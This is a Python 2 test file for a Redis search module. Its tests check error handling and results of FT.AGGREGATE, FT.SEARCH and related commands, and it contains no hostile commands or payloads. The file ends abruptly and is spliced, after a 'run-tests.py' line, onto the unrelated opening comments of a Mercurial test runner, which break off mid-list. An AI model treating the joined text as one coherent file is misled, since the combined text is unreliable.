if not env.isCluster(): # todo: remove once fix on coordinator
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'SUM', '1', '@test1').error()
def testGroupbyWithSort(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.add', 'idx', 'doc3', '1.0', 'FIELDS', 'test', '2').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '2', '@test', 'ASC',
'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0', 'as', 'count').equal([2L, ['test', '2', 'count', '1'], ['test', '1', 'count', '2']])
def testApplyError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'APPLY', 'split(@test)', 'as').error()
def testLoadError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', 'bad').error()
env.expect('ft.aggregate', 'idx', '*', 'LOAD', 'bad', 'test').error()
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '2', 'test').error()
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '2', '@test').error()
def testMissingArgsError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx').error()
def testUnexistsScorer(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.search', 'idx', '*', 'SCORER', 'bad').error()
def testHighlightWithUnknowsProperty(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'HIGHLIGHT', 'FIELDS', '1', 'test1').error()
def testBadFilterExpression(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'FILTER', 'blabla').error()
if not env.isCluster(): # todo: remove once fix on coordinator
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'FILTER', '@test1 > 1').error()
def testWithSortKeysOnNoneSortableValue(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.search', 'idx', '*', 'WITHSORTKEYS', 'SORTBY', 'test').equal([1L, 'doc1', '$foo', ['test', 'foo']])
def testWithWithRawIds(env):
env.skipOnCluster() # todo: remove once fix on coordinator
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.search', 'idx', '*', 'WITHRAWIDS').equal([1L, 'doc1', 1L, ['test', 'foo']])
def testUnkownIndex(env):
env.skipOnCluster() # todo: remove once fix on coordinator
env.expect('ft.aggregate').error()
env.expect('ft.aggregate', 'idx', '*').error()
env.expect('ft.aggregate', 'idx', '*', 'WITHCURSOR').error()
def testExplainError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('FT.EXPLAIN', 'idx', '(').error()
def testBadCursor(env):
env.expect('FT.CURSOR', 'READ', 'idx').error()
env.expect('FT.CURSOR', 'READ', 'idx', '1111').error()
env.expect('FT.CURSOR', 'READ', 'idx', 'bad').error()
env.expect('FT.CURSOR', 'DROP', 'idx', '1111').error()
env.expect('FT.CURSOR', 'bad', 'idx', '1111').error()
def testGroupByWithApplyError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
err = env.cmd('FT.AGGREGATE', 'idx', '*', 'APPLY', 'split()', 'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0', 'AS', 'count')[1]
assertEqualIgnoreCluster(env, str(err[0]), 'Invalid number of arguments for split')
def testSubStrErrors(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'matched_terms()', 'as', 'a', 'APPLY', 'substr(@a,0,4)')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test",3,-2)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test",3,1000)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test",-1,2)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test")', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr(1)', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test", "test")', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test", "test", "test")', 'as', 'a')
env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test2', 'APPLY', 'substr("test", "-1", "-1")', 'as', 'a')
env.assertTrue(env.isUp())
def testToUpperLower(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower(@test)', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'foo']])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower("FOO")', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'foo']])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper(@test)', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'FOO']])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper("foo")', 'as', 'a').equal([1L, ['test', 'foo', 'a', 'FOO']])
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper(1)', 'as', 'a').equal([1L, ['test', 'foo', 'a', None]])
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower(1)', 'as', 'a').equal([1L, ['test', 'foo', 'a', None]])
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'upper(1,2)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'lower(1,2)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
def testMatchedTerms(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'matched_terms()', 'as', 'a').equal([1L, ['test', 'foo', 'a', None]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms()', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms(100)', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms(-100)', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'matched_terms("test")', 'as', 'a').equal([1L, ['test', 'foo', 'a', ['foo']]])
def testStrFormatError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format("%s")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format("%", "test")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format("%b", "test")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'format(5)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', 'foo', 'LOAD', '1', '@test', 'APPLY', 'upper(1)', 'as', 'b', 'APPLY', 'format("%s", @b)', 'as', 'a').equal([1L, ['test', 'foo', 'b', None, 'a', '(null)']])
# working example
env.expect('ft.aggregate', 'idx', 'foo', 'APPLY', 'format("%%s-test", "test")', 'as', 'a').equal([1L, ['a', '%s-test']])
env.expect('ft.aggregate', 'idx', 'foo', 'APPLY', 'format("%s-test", "test")', 'as', 'a').equal([1L, ['a', 'test-test']])
def testTimeFormatError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
if not env.isCluster(): # todo: remove once fix on coordinator
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test1)', 'as', 'a').error()
env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test)', 'as', 'a')
env.assertTrue(env.isUp())
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test, 4)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt("awfawf")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(235325153152356426246246246254)', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'timefmt(@test, "%s")' % ('d' * 2048), 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'hour("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'minute("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'day("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'month("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'dayofweek("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'dayofmonth("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'dayofyear("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'year("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear("not_number")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
def testMonthOfYear(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear(@test)', 'as', 'a').equal([1L, ['test', '12234556', 'a', '4']])
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear(@test, 112)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'monthofyear("bad")', 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
def testParseTimeErrors(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time(11)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time(11,22)', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time("%s", "%s")' % ('d' * 2048, 'd' * 2048), 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'parse_time("test", "%s")' % ('d' * 2048), 'as', 'a').equal([1L, ['test', '12234556', 'a', None]])
def testMathFunctions(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'exp(@test)', 'as', 'a').equal([1L, ['test', '12234556', 'a', 'inf']])
env.expect('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'ceil(@test)', 'as', 'a').equal([1L, ['test', '12234556', 'a', '12234556']])
def testErrorOnOpperation(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '12234556').equal('OK')
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', '1 + split()', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'split() + 1', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', '"bad" + "bad"', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', 'split("bad" + "bad")', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'LOAD', '1', '@test', 'APPLY', '!(split("bad" + "bad"))', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
err = env.cmd('ft.aggregate', 'idx', '@test:[0..inf]', 'APPLY', '!@test', 'as', 'a')[1]
assertEqualIgnoreCluster(env, type(err[0]), redis.exceptions.ResponseError)
def testSortkeyUnsortable(env):
env.cmd('ft.create', 'idx', 'schema', 'test', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 'test', 'foo')
rv = env.cmd('ft.aggregate', 'idx', 'foo', 'withsortkeys',
'load', '1', '@test',
'sortby', '1', '@test')
env.assertEqual([1, '$foo', ['test', 'foo']], rv)
def testIssue919(env):
# This only works if the missing field has a lower sortable index
# than the present field..
env.cmd('ft.create', 'idx', 'schema', 't1', 'text', 'sortable', 'n1', 'numeric', 'sortable')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 'n1', 42)
rv = env.cmd('ft.search', 'idx', '*', 'sortby', 't1', 'desc')
env.assertEqual([1L, 'doc1', ['n1', '42']], rv)
def testIssue1074(env):
# Ensure that sortable fields are returned in their string form from the
# document
env.cmd('ft.create', 'idx', 'schema', 't1', 'text', 'n1', 'numeric', 'sortable')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello', 'n1', 1581011976800)
rv = env.cmd('ft.search', 'idx', '*', 'sortby', 'n1')
env.assertEqual([1L, 'doc1', ['n1', '1581011976800', 't1', 'hello']], rv)
def testIssue1085(env):
env.skipOnCluster()
env.cmd('FT.CREATE issue1085 SCHEMA foo TEXT SORTABLE bar NUMERIC SORTABLE')
for i in range(1, 10):
env.cmd('FT.ADD issue1085 document_%d 1 REPLACE FIELDS foo foo%d bar %d' % (i, i, i))
env.expect('FT.SEARCH', 'issue1085', '@bar:[8 8]').equal([1L, 'document_8', ['foo', 'foo8', 'bar', '8']])
for i in range(1, 10):
env.cmd('FT.ADD issue1085 document_8 1 REPLACE FIELDS foo foo8 bar 8')
env.expect('ft.debug GC_FORCEINVOKE issue1085').equal('DONE')
env.expect('FT.SEARCH', 'issue1085', '@bar:[8 8]').equal([1, 'document_8', ['foo', 'foo8', 'bar', '8']])
def grouper(iterable, n, fillvalue=None):
"Collect data into fixed-length chunks or blocks"
from itertools import izip_longest
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(fillvalue=fillvalue, *args)
def to_dict(r):
return {r[i]: r[i + 1] for i in range(0, len(r), 2)}
def testOptimize(env):
env.skipOnCluster()
env.cmd('ft.create', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE')
env.cmd('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo')
env.assertEqual(0, env.cmd('FT.OPTIMIZE', 'idx'))
with env.assertResponseError():
env.assertOk(env.cmd('FT.OPTIMIZE', 'idx', '666'))
env.expect('FT.OPTIMIZE', 'fake_idx').error()
def testInfoError(env):
env.expect('ft.info', 'no_idx').error()
def testSetPayload(env):
env.skipOnCluster()
env.expect('flushall')
env.expect('ft.create idx schema name text').equal('OK')
env.expect('ft.add idx hotel 1.0 fields name hilton').equal('OK')
env.expect('FT.SETPAYLOAD idx hotel payload').equal('OK')
env.expect('FT.SETPAYLOAD idx hotel payload').equal('OK')
env.expect('FT.SETPAYLOAD idx fake_hotel').error() \
.contains("wrong number of arguments for 'FT.SETPAYLOAD' command")
env.expect('FT.SETPAYLOAD fake_idx hotel payload').error().contains('Unknown Index name')
env.expect('FT.SETPAYLOAD idx fake_hotel payload').error().contains('Document not in index')
def testIndexNotRemovedFromCursorListAfterRecreated(env):
env.expect('FT.CREATE idx SCHEMA f1 TEXT').ok()
env.expect('FT.AGGREGATE idx * WITHCURSOR').equal([[0], 0])
env.expect('FT.CREATE idx SCHEMA f1 TEXT').error()
env.expect('FT.AGGREGATE idx * WITHCURSOR').equal([[0], 0])
def testHindiStemmer(env):
env.cmd('FT.CREATE', 'idxTest', 'SCHEMA', 'body', 'TEXT')
env.cmd('FT.ADD', 'idxTest', 'doc1', 1.0, 'LANGUAGE', 'hindi', 'FIELDS', 'body', u'अँगरेजी अँगरेजों अँगरेज़')
res = env.cmd('FT.SEARCH', 'idxTest', u'अँगरेज़')
env.assertEqual(u'अँगरेजी अँगरेजों अँगरेज़', unicode(res[2][1], 'utf-8'))
def testMOD507(env):
env.skipOnCluster()
env.expect('ft.create idx SCHEMA t1 TEXT').ok()
for i in range(50):
env.expect('ft.add idx doc-%d 1.0 FIELDS t1 foo' % i).ok()
for i in range(50):
env.expect('del doc-%d' % i).equal(1)
res = env.cmd('FT.SEARCH', 'idx', '*', 'WITHSCORES', 'SUMMARIZE', 'FRAGS', '1', 'LEN', '25', 'HIGHLIGHT', 'TAGS', "<span style='background-color:yellow'>", "</span>")
env.assertEqual(len(res), 31)
def testUnseportedSortableTypeErrorOnTags(env):
env.skipOnCluster()
env.expect('FT.CREATE idx SCHEMA f1 TEXT SORTABLE f2 NUMERIC SORTABLE NOINDEX f3 TAG SORTABLE NOINDEX f4 TEXT SORTABLE NOINDEX').ok()
env.expect('FT.ADD idx doc1 1.0 FIELDS f1 foo1 f2 1 f3 foo1 f4 foo1').ok()
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL FIELDS f2 2 f3 foo2 f4 foo2').ok()
env.expect('HGETALL doc1').equal(['f1', 'foo1', 'f2', '2', 'f3', 'foo2', 'f4', 'foo2'])
env.expect('FT.SEARCH idx *').equal([1L, 'doc1', ['f1', 'foo1', 'f2', '2', 'f3', 'foo2', 'f4', 'foo2']])
def testIssue1158(env):
env.cmd('FT.CREATE idx SCHEMA txt1 TEXT txt2 TEXT txt3 TEXT')
env.cmd('FT.ADD idx doc1 1.0 FIELDS txt1 10 txt2 num1')
env.expect('FT.GET idx doc1').equal(['txt1', '10', 'txt2', 'num1'])
# only 1st checked (2nd returns an error)
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if @txt1||to_number(@txt2)<5 FIELDS txt1 5').equal('OK')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if @txt3&&to_number(@txt2)<5 FIELDS txt1 5').equal('NOADD')
# both are checked
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11||to_number(@txt1)>42 FIELDS txt2 num2').equal('NOADD')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11||to_number(@txt1)<42 FIELDS txt2 num2').equal('OK')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11&&to_number(@txt1)>42 FIELDS txt2 num2').equal('NOADD')
env.expect('FT.ADD idx doc1 1.0 REPLACE PARTIAL if to_number(@txt1)>11&&to_number(@txt1)<42 FIELDS txt2 num2').equal('NOADD')
env.expect('FT.GET idx doc1').equal(['txt1', '5', 'txt2', 'num2'])
def testIssue1159(env):
env.cmd('FT.CREATE idx SCHEMA f1 TAG')
for i in range(1000):
env.cmd('FT.add idx doc%d 1.0 FIELDS f1 foo' % i)
def testIssue1169(env):
env.cmd('FT.CREATE idx SCHEMA txt1 TEXT txt2 TEXT')
env.cmd('FT.ADD idx doc1 1.0 FIELDS txt1 foo')
env.expect('FT.AGGREGATE idx foo GROUPBY 1 @txt1 REDUCE FIRST_VALUE 1 @txt2 as test').equal([1L, ['txt1', 'foo', 'test', None]])
def testIssue1184(env):
field_types = ['TEXT', 'NUMERIC', 'TAG']
for ft in field_types:
env.assertOk(env.execute_command('FT.CREATE idx SCHEMA field ' + ft))
res = env.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['inverted_sz_mb'], '0')
env.assertEqual(d['num_records'], '0')
value = '42'
env.assertOk(env.execute_command('FT.ADD idx doc0 1 FIELD field ' + value))
doc = env.cmd('FT.SEARCH idx *')
env.assertEqual(doc, [1L, 'doc0', ['field', value]])
res = env.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertGreater(d['inverted_sz_mb'], '0')
env.assertEqual(d['num_records'], '1')
env.assertEqual(env.execute_command('FT.DEL idx doc0'), 1)
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
res = env.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['inverted_sz_mb'], '0')
env.assertEqual(d['num_records'], '0')
env.cmd('FT.DROP idx')
def testIssue1208(env):
env.cmd('FT.CREATE idx SCHEMA n NUMERIC')
env.cmd('FT.ADD idx doc1 1 FIELDS n 1.0321e5')
env.cmd('FT.ADD idx doc2 1 FIELDS n 101.11')
env.cmd('FT.ADD idx doc3 1 FIELDS n 0.0011')
env.expect('FT.SEARCH', 'idx', '@n:[1.1432E3 inf]').equal([1L, 'doc1', ['n', '1.0321e5']])
env.expect('FT.SEARCH', 'idx', '@n:[-1.12E-3 1.12E-1]').equal([1L, 'doc3', ['n', '0.0011']])
res = [3L, 'doc3', ['n', '0.0011'], 'doc2', ['n', '101.11'], 'doc1', ['n', '1.0321e5']]
env.expect('FT.SEARCH', 'idx', '@n:[-inf inf]').equal(res)
env.expect('FT.ADD idx doc3 1 REPLACE PARTIAL IF @n>42e3 FIELDS n 100').equal('NOADD')
env.expect('FT.ADD idx doc3 1 REPLACE PARTIAL IF @n<42e3 FIELDS n 100').ok()
print env.cmd('FT.SEARCH', 'idx', '@n:[-inf inf]')
|
run-tests.py
|
#!/usr/bin/env python3
#
# run-tests.py - Run a set of tests on Mercurial
#
# Copyright 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
# Modifying this script is tricky because it has many modes:
# - serial (default) vs parallel (-jN, N > 1)
# - no coverage (default) vs coverage (-c, -C, -s)
# - temp install (default) vs specific hg script (--with-hg, --local)
# - tests are a mix of shell scripts and Python scripts
#
# If you change this script, it is recommended that you ensure you
# haven't broken it by running it in various modes with a representative
# sample of test scripts. For example:
#
# 1) serial, no coverage, temp install:
# ./run-tests.py test-s*
# 2) serial, no coverage, local hg:
# ./run-tests.py --local test-s*
# 3) serial, coverage, temp install:
# ./run-tests.py -c test-s*
# 4) serial, coverage, local hg:
# ./run-tests.py -c --local test-s* # unsupported
# 5) parallel, no coverage, temp install:
# ./run-tests.py -j2 test-s*
# 6) parallel, no coverage, local hg:
# ./run-tests.py -j2 --local test-s*
# 7) parallel, coverage, temp install:
# ./run-tests.py -j2 -c test-s* # currently broken
# 8) parallel, coverage, local install:
# ./run-tests.py -j2 -c --local test-s* # unsupported (and broken)
# 9) parallel, custom tmp dir:
# ./run-tests.py -j2 --tmpdir /tmp/myhgtests
# 10) parallel, pure, tests that call run-tests:
